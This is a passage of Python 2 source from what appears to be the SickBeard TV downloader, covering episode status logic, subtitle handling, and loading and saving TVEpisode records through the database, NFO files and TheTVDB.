myDB.upsert("tv_shows", newValueDict, controlValueDict)
if self.imdbid:
controlValueDict = {"tvdb_id": self.tvdbid}
newValueDict = self.imdb_info
myDB.upsert("imdb_info", newValueDict, controlValueDict)
def __str__(self):
toReturn = ""
toReturn += "name: " + self.name + "\n"
toReturn += "location: " + self._location + "\n"
toReturn += "tvdbid: " + str(self.tvdbid) + "\n"
if self.network != None:
toReturn += "network: " + self.network + "\n"
if self.airs != None:
toReturn += "airs: " + self.airs + "\n"
if self.status != None:
toReturn += "status: " + self.status + "\n"
toReturn += "startyear: " + str(self.startyear) + "\n"
toReturn += "genre: " + self.genre + "\n"
toReturn += "runtime: " + str(self.runtime) + "\n"
toReturn += "quality: " + str(self.quality) + "\n"
return toReturn
def wantEpisode(self, season, episode, quality, manualSearch=False):
logger.log(u"Checking if we want episode "+str(season)+"x"+str(episode)+" at quality "+Quality.qualityStrings[quality], logger.DEBUG)
# if the quality isn't one we want under any circumstances then just say no
anyQualities, bestQualities = Quality.splitQuality(self.quality)
logger.log(u"any,best = "+str(anyQualities)+" "+str(bestQualities)+" and we are "+str(quality), logger.DEBUG)
if quality not in anyQualities + bestQualities:
logger.log(u"I know for sure I don't want this episode, saying no", logger.DEBUG)
return False
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT status FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?", [self.tvdbid, season, episode])
if not sqlResults or not len(sqlResults):
logger.log(u"Unable to find the episode", logger.DEBUG)
return False
epStatus = int(sqlResults[0]["status"])
logger.log(u"current episode status: "+str(epStatus), logger.DEBUG)
# if we know we don't want it then just say no
if epStatus in (SKIPPED, IGNORED, ARCHIVED) and not manualSearch:
logger.log(u"Ep is skipped, not bothering", logger.DEBUG)
return False
# if it's one of these then we want it as long as it's in our allowed initial qualities
if quality in anyQualities + bestQualities:
if epStatus in (WANTED, UNAIRED, SKIPPED):
logger.log(u"Ep is wanted/unaired/skipped, definitely get it", logger.DEBUG)
return True
elif manualSearch:
logger.log(u"Usually I would ignore this ep but because you forced the search I'm overriding the default and allowing the quality", logger.DEBUG)
return True
else:
logger.log(u"This quality looks like something we might want but I don't know for sure yet", logger.DEBUG)
curStatus, curQuality = Quality.splitCompositeStatus(epStatus)
# if we are re-downloading then we only want it if it's in our bestQualities list and better than what we have
if curStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.SNATCHED_FRENCH and quality in bestQualities and quality > curQuality:
logger.log(u"We already have this ep but the new one is better quality, saying yes", logger.DEBUG)
return True
logger.log(u"None of the conditions were met so I'm just saying no", logger.DEBUG)
return False
def getOverview(self, epStatus):
if epStatus == WANTED:
return Overview.WANTED
elif epStatus in (UNAIRED, UNKNOWN):
return Overview.UNAIRED
elif epStatus in (SKIPPED, IGNORED):
return Overview.SKIPPED
elif epStatus == ARCHIVED:
return Overview.GOOD
elif epStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.SNATCHED_FRENCH:
anyQualities, bestQualities = Quality.splitQuality(self.quality) #@UnusedVariable
if bestQualities:
maxBestQuality = max(bestQualities)
else:
maxBestQuality = None
epStatus, curQuality = Quality.splitCompositeStatus(epStatus)
if epStatus in (SNATCHED, SNATCHED_PROPER, SNATCHED_FRENCH):
return Overview.SNATCHED
# if they don't want re-downloads then we call it good if they have anything
elif maxBestQuality == None:
return Overview.GOOD
# if they have one but it's not the best they want then mark it as qual
elif curQuality < maxBestQuality:
return Overview.QUAL
# if it's >= maxBestQuality then it's good
else:
return Overview.GOOD
def dirty_setter(attr_name):
def wrapper(self, val):
if getattr(self, attr_name) != val:
setattr(self, attr_name, val)
self.dirty = True
return wrapper
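# Illustrative note (not part of the original file): dirty_setter() builds property setters
# that flip self.dirty only when the backing attribute actually changes, e.g.
#
#   name = property(lambda self: self._name, dirty_setter("_name"))
#
# so callers can check ep.dirty before calling saveToDB(), as loadEpisodesFromTVDB does above.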
class TVEpisode(object):
def __init__(self, show, season, episode, file="", scene=False):
self._name = ""
self._season = season
self._episode = episode
self._description = ""
self._subtitles = list()
self._subtitles_searchcount = 0
self._subtitles_lastsearch = str(datetime.datetime.min)
self._airdate = datetime.date.fromordinal(1)
self._hasnfo = False
self._hastbn = False
self._status = UNKNOWN
self._tvdbid = 0
self._file_size = 0
self._audio_langs = ''
self._release_name = ''
self.scene = scene
self._scene_season = None
self._scene_episode = None
if self.scene:
self._scene_season = self._season
self._scene_episode = self._episode
# setting any of the above sets the dirty flag
self.dirty = True
self.show = show
self._location = file
self.lock = threading.Lock()
self.relatedEps = []
self.specifyEpisode(self.season, self.episode)
self.checkForMetaFiles()
name = property(lambda self: self._name, dirty_setter("_name"))
season = property(lambda self: self._season, dirty_setter("_season"))
episode = property(lambda self: self._episode, dirty_setter("_episode"))
description = property(lambda self: self._description, dirty_setter("_description"))
subtitles = property(lambda self: self._subtitles, dirty_setter("_subtitles"))
subtitles_searchcount = property(lambda self: self._subtitles_searchcount, dirty_setter("_subtitles_searchcount"))
subtitles_lastsearch = property(lambda self: self._subtitles_lastsearch, dirty_setter("_subtitles_lastsearch"))
airdate = property(lambda self: self._airdate, dirty_setter("_airdate"))
hasnfo = property(lambda self: self._hasnfo, dirty_setter("_hasnfo"))
hastbn = property(lambda self: self._hastbn, dirty_setter("_hastbn"))
status = property(lambda self: self._status, dirty_setter("_status"))
tvdbid = property(lambda self: self._tvdbid, dirty_setter("_tvdbid"))
#location = property(lambda self: self._location, dirty_setter("_location"))
file_size = property(lambda self: self._file_size, dirty_setter("_file_size"))
audio_langs = property(lambda self: self._audio_langs, dirty_setter("_audio_langs"))
release_name = property(lambda self: self._release_name, dirty_setter("_release_name"))
scene_season = property(lambda self: self._getSceneOrTVDBSeason(), dirty_setter("_scene_season"))
scene_episode = property(lambda self: self._getSceneOrTVDBEpisode(), dirty_setter("_scene_episode"))
def _getSceneOrTVDBSeason(self):
if self._scene_season is None:
return self.season
else:
return self._scene_season
def _getSceneOrTVDBEpisode(self):
if self._scene_episode is None:
return self.episode
else:
return self._scene_episode
def _set_location(self, new_location):
logger.log(u"Setter sets location to " + new_location, logger.DEBUG)
#self._location = newLocation
dirty_setter("_location")(self, new_location)
if new_location and ek.ek(os.path.isfile, new_location):
self.file_size = ek.ek(os.path.getsize, new_location)
else:
self.file_size = 0
location = property(lambda self: self._location, _set_location)
def refreshSubtitles(self):
"""Look for subtitles files and refresh the subtitles property"""
self.subtitles = subtitles.subtitlesLanguages(self.location)
def downloadSubtitles(self):
#TODO: Add support for force option
if not ek.ek(os.path.isfile, self.location):
logger.log(str(self.show.tvdbid) + ": Episode file doesn't exist, can't download subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
return
logger.log(str(self.show.tvdbid) + ": Downloading subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
previous_subtitles = self.subtitles
try:
need_languages = set(sickbeard.SUBTITLES_LANGUAGES) - set(self.subtitles)
subtitles = subliminal.download_subtitles([self.location], languages=need_languages, services=sickbeard.subtitles.getEnabledServiceList(), force=False, multi=True, cache_dir=sickbeard.CACHE_DIR)
except Exception as e:
logger.log("Error occurred when downloading subtitles: " + str(e), logger.DEBUG)
return
self.refreshSubtitles()
        self.subtitles_searchcount = self.subtitles_searchcount + 1 if self.subtitles_searchcount else 1  # added the 'if' because sometimes it raises an error otherwise
self.subtitles_lastsearch = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.saveToDB()
newsubtitles = set(self.subtitles).difference(set(previous_subtitles))
if newsubtitles:
subtitleList = ", ".join(subliminal.language.Language(x).name for x in newsubtitles)
logger.log(str(self.show.tvdbid) + ": Downloaded " + subtitleList + " subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
notifiers.notify_subtitle_download(self.prettyName(), subtitleList)
else:
logger.log(str(self.show.tvdbid) + ": No subtitles downloaded for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
if newsubtitles and (sickbeard.SUBTITLES_CLEAN_HI or sickbeard.SUBTITLES_CLEAN_TEAM or sickbeard.SUBTITLES_CLEAN_MUSIC or sickbeard.SUBTITLES_CLEAN_PUNC):
logger.log("TIDYSUB: Try to clean sub", logger.DEBUG)
for video in subtitles:
for subtitle in subtitles.get(video):
sub = cleaner.TidySub(subtitle.path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
if sickbeard.SUBTITLES_HISTORY:
for video in subtitles:
for subtitle in subtitles.get(video):
history.logSubtitle(self.show.tvdbid, self.season, self.episode, self.status, subtitle)
if sickbeard.SUBTITLES_DIR:
for video in subtitles:
subs_new_path = ek.ek(os.path.join, os.path.dirname(video.path), sickbeard.SUBTITLES_DIR)
if not ek.ek(os.path.isdir, subs_new_path):
ek.ek(os.mkdir, subs_new_path)
for subtitle in subtitles.get(video):
new_file_path = ek.ek(os.path.join, subs_new_path, os.path.basename(subtitle.path))
helpers.moveFile(subtitle.path, new_file_path)
if sickbeard.SUBSNOLANG:
helpers.copyFile(new_file_path,new_file_path[:-6]+"srt")
elif sickbeard.SUBTITLES_DIR_SUB:
for video in subtitles:
subs_new_path = os.path.join(os.path.dirname(video.path), "Subs")
if not os.path.isdir(subs_new_path):
os.makedirs(subs_new_path)
for subtitle in subtitles.get(video):
new_file_path = ek.ek(os.path.join, subs_new_path, os.path.basename(subtitle.path))
helpers.moveFile(subtitle.path, new_file_path)
subtitle.path=new_file_path
if sickbeard.SUBSNOLANG:
helpers.copyFile(new_file_path,new_file_path[:-6]+"srt")
subtitle.path=new_file_path
else:
for video in subtitles:
for subtitle in subtitles.get(video):
if sickbeard.SUBSNOLANG:
helpers.copyFile(subtitle.path,subtitle.path[:-6]+"srt")
helpers.chmodAsParent(subtitle.path[:-6]+"srt")
helpers.chmodAsParent(subtitle.path)
return subtitles
def cleanSubtitles(self):
if not ek.ek(os.path.isfile, self.location):
logger.log(str(self.show.tvdbid) + ": Episode file doesn't exist, can't clean subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
return
logger.log(str(self.show.tvdbid) + ": Cleaning subtitles for episode " + str(self.season) + "x" + str(self.episode))
self.refreshSubtitles()
subtitles = set(self.subtitles)
if subtitles and (sickbeard.SUBTITLES_CLEAN_HI or sickbeard.SUBTITLES_CLEAN_TEAM or sickbeard.SUBTITLES_CLEAN_MUSIC or sickbeard.SUBTITLES_CLEAN_PUNC):
logger.log("TIDYSUB: Try to clean sub", logger.DEBUG)
if sickbeard.SUBTITLES_DIR_SUB:
if sickbeard.SUBSNOLANG:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename()+".srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
elif sickbeard.SUBTITLES_DIR:
if sickbeard.SUBSNOLANG:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(sickbeard.SUBTITLES_DIR),"Subs"), self.formatted_filename()+".srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(sickbeard.SUBTITLES_DIR),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(sickbeard.SUBTITLES_DIR),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
if sickbeard.SUBSNOLANG:
subtitle_path = ek.ek(os.path.join, os.path.dirname(self.location), self.formatted_filename()+".srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
subtitle_path = ek.ek(os.path.join, os.path.dirname(self.location), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
subtitle_path = ek.ek(os.path.join, os.path.dirname(self.location), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
return subtitles
def checkForMetaFiles(self):
oldhasnfo = self.hasnfo
oldhastbn = self.hastbn
cur_nfo = False
cur_tbn = False
# check for nfo and tbn
if ek.ek(os.path.isfile, self.location):
for cur_provider in sickbeard.metadata_provider_dict.values():
if cur_provider.episode_metadata:
new_result = cur_provider._has_episode_metadata(self)
else:
new_result = False
cur_nfo = new_result or cur_nfo
if cur_provider.episode_thumbnails:
new_result = cur_provider._has_episode_thumb(self)
else:
new_result = False
cur_tbn = new_result or cur_tbn
self.hasnfo = cur_nfo
self.hastbn = cur_tbn
# if either setting has changed return true, if not return false
return oldhasnfo != self.hasnfo or oldhastbn != self.hastbn
def specifyEpisode(self, season, episode):
sqlResult = self.loadFromDB(season, episode)
# we need this because if the db load was done with scene numbering we changed the actual ep and season numbers,
# so the numbers passed in are no longer valid and have been replaced with tvdb numbers
if sqlResult:
season = self.season
episode = self.episode
if not sqlResult:
# only load from NFO if we didn't load from DB
if ek.ek(os.path.isfile, self.location):
try:
self.loadFromNFO(self.location)
except exceptions.NoNFOException:
logger.log(str(self.show.tvdbid) + ": There was an error loading the NFO for episode " + str(season) + "x" + str(episode), logger.ERROR)
pass
# if we tried loading it from NFO and didn't find the NFO, use TVDB
if self.hasnfo == False:
try:
result = self.loadFromTVDB(season, episode)
except exceptions.EpisodeDeletedException:
result = False
# if we failed SQL *and* NFO *and* TVDB then fail
if result == False:
raise exceptions.EpisodeNotFoundException("Couldn't find episode " + str(season) + "x" + str(episode))
# don't update if not needed
if self.dirty:
self.saveToDB()
def loadFromDB(self, season, episode):
msg = ''
if self.scene:
msg = "(mode: scene numbers)"
logger.log(str(self.show.tvdbid) + ": Loading episode details from DB for episode " + msg + " " + str(season) + "x" + str(episode), logger.DEBUG)
myDB = db.DBConnection()
if not self.scene:
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?", [self.show.tvdbid, season, episode])
else:
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND scene_season = ? AND scene_episode = ?", [self.show.tvdbid, season, episode])
if len(sqlResults) > 1 and not self.scene:
raise exceptions.MultipleDBEpisodesException("Your DB has two records for the same episode somehow."+msg)
elif len(sqlResults) > 1 and self.scene:
first = True
for relatedEP in sqlResults:
if first: # the first result shall be the root ep
first = False
continue
logger.log(str(self.show.tvdbid) + ": Adding a related episode because of a scene mapping with tvdb numbers " + str(relatedEP["season"]) + "x" + str(relatedEP["episode"]), logger.DEBUG)
rel_ep_obj = TVEpisode(self.show, int(relatedEP["season"]), int(relatedEP["episode"]))
self.relatedEps.append(rel_ep_obj)
elif len(sqlResults) == 0:
logger.log(str(self.show.tvdbid) + ": Episode " +msg+ str(self.season) + "x" + str(self.episode) + " not found in the database", logger.DEBUG)
return False
else:
#NAMEIT logger.log(u"AAAAA from" + str(self.season)+"x"+str(self.episode) + " -" + self.name + " to " + str(sqlResults[0]["name"]))
if sqlResults[0]["name"] != None:
self.name = sqlResults[0]["name"]
if not self.scene:
self.season = season
self.episode = episode
else:
self.season = int(sqlResults[0]["season"])
self.episode = int(sqlResults[0]["episode"])
self.description = sqlResults[0]["description"]
if self.description == None:
self.description = ""
if sqlResults[0]["subtitles"] != None and sqlResults[0]["subtitles"] != '':
self.subtitles = sqlResults[0]["subtitles"].split(",")
self.subtitles_searchcount = sqlResults[0]["subtitles_searchcount"]
self.subtitles_lastsearch = sqlResults[0]["subtitles_lastsearch"]
self.airdate = datetime.date.fromordinal(int(sqlResults[0]["airdate"]))
#logger.log(u"1 Status changes from " + str(self.status) + " to " + str(sqlResults[0]["status"]), logger.DEBUG)
self.status = int(sqlResults[0]["status"])
# don't overwrite my location
if sqlResults[0]["location"] != "" and sqlResults[0]["location"] != None:
self.location = os.path.normpath(sqlResults[0]["location"])
if sqlResults[0]["file_size"]:
self.file_size = int(sqlResults[0]["file_size"])
else:
self.file_size = 0
self.tvdbid = int(sqlResults[0]["tvdbid"])
# is there a better way to test for NULL in the db field?
if isinstance(sqlResults[0]["scene_season"], int):
self.scene_season = int(sqlResults[0]["scene_season"])
if isinstance(sqlResults[0]["scene_episode"], int):
self.scene_episode = int(sqlResults[0]["scene_episode"])
logger.log("Episode loading done " + msg + str(self.season) + "x" + str(self.episode), logger.DEBUG)
self.scene = False
if sqlResults[0]["audio_langs"] != None:
self.audio_langs = sqlResults[0]["audio_langs"]
if sqlResults[0]["release_name"] != None:
self.release_name = sqlResults[0]["release_name"]
self.dirty = False
return True
def loadFromTVDB(self, season=None, episode=None, cache=True, tvapi=None, cachedSeason=None):
if season == None:
season = self.season
if episode == None:
episode = self.episode
logger.log(str(self.show.tvdbid) + ": Loading episode details from theTVDB for episode " + str(season) + "x" + str(episode), logger.DEBUG)
tvdb_lang = self.show.lang
try:
if cachedSeason is None:
if tvapi is None:
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if not cache:
ltvdb_api_parms['cache'] = False
if tvdb_lang:
ltvdb_api_parms['language'] = tvdb_lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
else:
t = tvapi
myEp = t[self.show.tvdbid][season][episode]
else:
myEp = cachedSeason[episode]
except (tvdb_exceptions.tvdb_error, IOError), e:
logger.log(u"TVDB threw up an error: "+ex(e), logger.DEBUG)
# if the episode is already valid just log it, if not throw it up
if self.name:
logger.log(u"TVDB timed out but we have enough info from other sources, allowing the error", logger.DEBUG)
return
else:
logger.log(u"TVDB timed out, unable to create the episode", logger.ERROR)
return False
except (tvdb_exceptions.tvdb_episodenotfound, tvdb_exceptions.tvdb_seasonnotfound):
logger.log(u"Unable to find the episode on tvdb... has it been removed? Should I delete from db?", logger.DEBUG)
# if I'm no longer on TVDB but I once was then delete myself from the DB
if self.tvdbid != -1:
self.deleteEpisode()
return
if not myEp["firstaired"] or myEp["firstaired"] == "0000-00-00":
myEp["firstaired"] = str(datetime.date.fromordinal(1))
if myEp["episodename"] == None or myEp["episodename"] == "":
logger.log(u"This episode ("+self.show.name+" - "+str(season)+"x"+str(episode)+") has no name on TVDB")
# if I'm incomplete on TVDB but I once was complete then just delete myself from the DB for now
if self.tvdbid != -1:
self.deleteEpisode()
return False
#NAMEIT logger.log(u"BBBBBBBB from " + str(self.season)+"x"+str(self.episode) + " -" +self.name+" to "+myEp["episodename"])
self.name = myEp["episodename"]
self.season = season
self.episode = episode
tmp_description = myEp["overview"]
if tmp_description == None:
self.description = ""
else:
self.description = tmp_description
rawAirdate = [int(x) for x in myEp["firstaired"].split("-")]
try:
self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2])
except ValueError:
logger.log(u"Malformed air date retrieved from TVDB ("+self.show.name+" - "+str(season)+"x"+str(episode)+")", logger.ERROR)
# if I'm incomplete on TVDB but I once was complete then just delete myself from the DB for now
if self.tvdbid != -1:
self.deleteEpisode()
return False
#early conversion to int so that episode doesn't get marked dirty
self.tvdbid = int(myEp["id"])
#don't update show status if show dir is missing, unless missing show dirs are created during post-processing
if not ek.ek(os.path.isdir, self.show._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS:
logger.log(u"The show dir is missing, not bothering to change the episode statuses since it'd probably be invalid")
return
logger.log(str(self.show.tvdbid) + ": Setting status for " + str(season) + "x" + str(episode) + " based on status " + str(self.status) + " and existence of " + self.location, logger.DEBUG)
if not ek.ek(os.path.isfile, self.location):
# if we don't have the file
if self.airdate >= datetime.date.today() and self.status not in Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.SNATCHED_FRENCH:
# and it hasn't aired yet set the status to UNAIRED
logger.log(u"Episode airs in the future, changing status from " + str(self.status) + " to " + str(UNAIRED), logger.DEBUG)
self.status = UNAIRED
# if there's no airdate then set it to skipped (and respect ignored)
elif self.airdate == datetime.date.fromordinal(1):
if self.status == IGNORED:
logger.log(u"Episode has no air date, but it's already marked as ignored", logger.DEBUG)
else:
logger.log(u"Episode has no air date, automatically marking it skipped", logger.DEBUG)
self.status = SKIPPED
# if we don't have the file and the airdate is in the past
else:
if self.status == UNAIRED:
self.status = WANTED
# if we somehow are still UNKNOWN then just skip it
elif self.status == UNKNOWN:
self.status = SKIPPED
else:
logger.log(u"Not touching status because we have no ep file, the airdate is in the past, and the status is "+str(self.status), logger.DEBUG)
# if we have a media file then it's downloaded
elif sickbeard.helpers.isMediaFile(self.location):
# leave propers alone, you have to either post-process them or manually change them back
if self.status not in Quality.SNATCHED_FRENCH + Quality.SNATCHED_PROPER + Quality.DOWNLOADED + Quality.SNATCHED + [ARCHIVED]:
logger.log(u"5 Status changes from " + str(self.status) + " to " + str(Quality.statusFromName(self.location)), logger.DEBUG)
self.status = Quality.statusFromName(self.location)
# shouldn't get here probably
else:
logger.log(u"6 Status changes from " + str(self.status) + " to " + str(UNKNOWN), logger.DEBUG)
self.status = UNKNOWN
# hasnfo, hastbn, status?
def loadFromNFO(self, location):
if not os.path.isdir(self.show._location):
logger.log(str(self.show.tvdbid) + ": The show dir is missing, not bothering to try loading the episode NFO")
return
logger.log(str(self.show.tvdbid) + ": Loading episode details from the NFO file associated with " + location, logger.DEBUG)
self.location = location
if self.location != "":
if self.status == UNKNOWN:
if sickbeard.helpers.isMediaFile(self.location):
logger.log(u"7 Status changes from " + str(self.status) + " to " + str(Quality.statusFromName(self.location)), logger.DEBUG)
self.status = Quality.statusFromName(self.location)
nfoFile = sickbeard.helpers.replaceExtension(self.location, "nfo")
logger.log(str(self.show.tvdbid) + ": Using NFO name " + nfoFile, logger.DEBUG)
if ek.ek(os.path.isfile, nfoFile):
try:
showXML = etree.ElementTree(file = nfoFile)
except (SyntaxError, ValueError), e:
logger.log(u"Error loading the NFO, backing up the NFO and skipping for now: " + ex(e), logger.ERROR) #TODO: figure out what's wrong and fix it
try:
ek.ek(os.rename, nfoFile, nfoFile + ".old")
except Exception, e:
logger.log(u"Failed to rename your episode's NFO file - you need to delete it or fix it: " + ex(e), logger.ERROR)
raise exceptions.NoNFOException("Error in NFO format")
for epDetails in showXML.getiterator('episodedetails'):
if epDetails.findtext('season') == None or int(epDetails.findtext('season')) != self.season or \
epDetails.findtext('episode') == None or int(epDetails.findtext('episode')) != self.episode:
logger.log(str(self.show.tvdbid) + ": NFO has an <episodedetails> block for a different episode - wanted " + str(self.season) + "x" + str(self.episode) + " but got " + str(epDetails.findtext('season')) + "x" + str(epDetails.findtext('episode')), logger.DEBUG)
continue
if epDetails.findtext('title') == None or epDetails.findtext('aired') == None:
raise exceptions.NoNFOException("Error in NFO format (missing episode title or airdate)")
self.name = epDetails.findtext('title')
self.episode = int(epDetails.findtext('episode'))
self.season = int(epDetails.findtext('season'))
self.description = epDetails.findtext('plot')
if self.description == None:
self.description = ""
if epDetails.findtext('aired'):
rawAirdate = [int(x) for x in epDetails.findtext('aired').split("-")]
self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2])
else:
self.airdate = datetime.date.fromordinal(1)
self.hasnfo = True
else:
self.hasnfo = False
if ek.ek(os.path.isfile, sickbeard.helpers.replaceExtension(nfoFile, "tbn")):
self.hastbn = True
else:
self.hastbn = False
def __str__ (self):
toReturn = ""
toReturn += str(self.show.name) + " - " + str(self.season) + "x" + str(self.episode) + " - " + str(self.name) + "\n"
toReturn += "location: " + str(self.location) + "\n"
toReturn += "description: " + str(self.description) + "\n"
toReturn += "subtitles: " + str(",".join(self.subtitles)) + "\n"
toReturn += "subtitles_searchcount: " + str(self.subtitles_searchcount) + "\n"
toReturn += "subtitles_lastsearch: " + str(self.subtitles_lastsearch) + "\n"
toReturn += "airdate: " + str(self.airdate.toordinal()) + " (" + str(self.airdate) + ")\n"
toReturn += "hasnfo: " + str(self.hasnfo) + "\n"
toReturn += "hastbn: " + str(self.hastbn) + "\n"
toReturn += "status: " + str(self.status) + "\n"
toReturn += "languages: " + str(self.audio_langs) + "\n"
return toReturn
def createMetaFiles(self, force=False):
if not ek.ek(os.path.isdir, self.show._location):
logger.log(str(self.show.tvdbid) + ": The show dir is missing, not bothering to try to create metadata")
return
self.createNFO(force)
self.createThumbnail(force)
if self.checkForMetaFiles():
self.saveToDB()
def createNFO(self, force=False):
result = False
for cur_provider in sickbeard.metadata_provider_dict.values():
result = cur_provider.create_episode_metadata(self) or result
return result
def createThumbnail(self, force=False):
result = False
for cur_provider in sickbeard.metadata_provider_dict.values():
result = cur_provider.create_episode_thumb(self) or result
return result
def deleteEpisode(self):
logger.log(u"Deleting "+self.show.name+" "+str(self.season)+"x"+str(self.episode)+" from the DB", logger.DEBUG)
# remove myself from the show dictionary
if self.show.getEpisode(self.season, self.episode, noCreate=True) == self:
logger.log(u"Removing myself from my show's list", logger.DEBUG)
del self.show.episodes[self.season][self.episode]
# delete myself from the DB
logger.log(u"Deleting myself from the database", logger.DEBUG)
myDB = db.DBConnection()
sql = "DELETE FROM tv_episodes WHERE showid="+str(self.show.tvdbid)+" AND season="+str(self.season)+" AND episode="+str(self.episode)
myDB.action(sql)
raise exceptions.EpisodeDeletedException()
def saveToDB(self, forceSave=False):
"""
Saves this episode to the database if any of its data has been changed since the last save.
forceSave: If True it will save to the database even if no data has been changed since the
last save (aka if the record is not dirty).
"""
if not self.dirty and not forceSave:
logger.log(str(self.show.tvdbid) + ": Not saving episode to db - record is not dirty", logger.DEBUG)
return
logger.log(str(self.show.tvdbid) + ": Saving episode details to database", logger.DEBUG)
logger.log(u"STATUS IS " + str(self.status), logger.DEBUG)
myDB = db.DBConnection()
newValueDict = {"tvdbid": self.tvdbid,
"name": self.name,
"description": self.description,
"subtitles": ",".join([sub for sub in self.subtitles]),
"subtitles_searchcount": self.subtitles_searchcount,
"subtitles_lastsearch": self.subtitles_lastsearch,
"airdate": self.airdate.toordinal(),
"hasnfo": self.hasnfo,
"hastbn": self.hastbn,
"status": self.status,
"location": self.location,
"scene_season": self._scene_season,
"scene_episode": self._scene_episode,
"audio_langs": self.audio_langs,
"file_size": self.file_size,
"release_name": self.release_name}
controlValueDict = {"showid": self.show.tvdbid,
"season": self.season,
"episode": self.episode}
# use a custom update/insert method to get the data into the DB
myDB.upsert("tv_episodes", newValueDict, controlValueDict)
def fullPath (self):
if self.location == None or self.location == "":
return None
else:
return ek.ek(os.path.join, self.show.location, self.location)
def prettyName(self):
"""
Returns the name of this episode in a "pretty" human-readable format. Used for logging
and notifications and such.
Returns: A string representing the episode's name and season/ep numbers
"""
return self._format_pattern('%SN - %Sx%0E - %EN')
def _ep_name(self):
"""
Returns the name of the episode to use during renaming. Combines the names of related episodes.
Eg. "Ep Name (1)" and "Ep Name (2)" becomes "Ep Name"
"Ep Name" and "Other Ep Name" becomes "Ep Name & Other Ep Name"
"""
multiNameRegex = "(.*) \(\d\)"
self.relatedEps = sorted(self.relatedEps, key=lambda x: x.episode)
if len(self.relatedEps) == 0:
goodName = self.name
else:
goodName = ''
singleName = True
curGoodName = None
for curName in [self.name] + [x.name for x in self.relatedEps]:
match = re.match(multiNameRegex, curName)
if not match:
singleName = False
break
if curGoodName == None:
curGoodName = match.group(1)
elif curGoodName != match.group(1):
singleName = False
break
if singleName:
goodName = curGoodName
else:
goodName = self.name
for relEp in self.relatedEps:
goodName += " & " + relEp.name
return goodName
def _replace_map(self):
"""
Generates a replacement map for this episode which maps all possible custom naming patterns to the correct
value for this episode.
Returns: A dict with patterns as the keys and their replacement values as the values.
"""
ep_name = self._ep_name()
def dot(name):
return helpers.sanitizeSceneName(name)
def us(name):
return re.sub('[ -]','_', name)
def release_name(name):
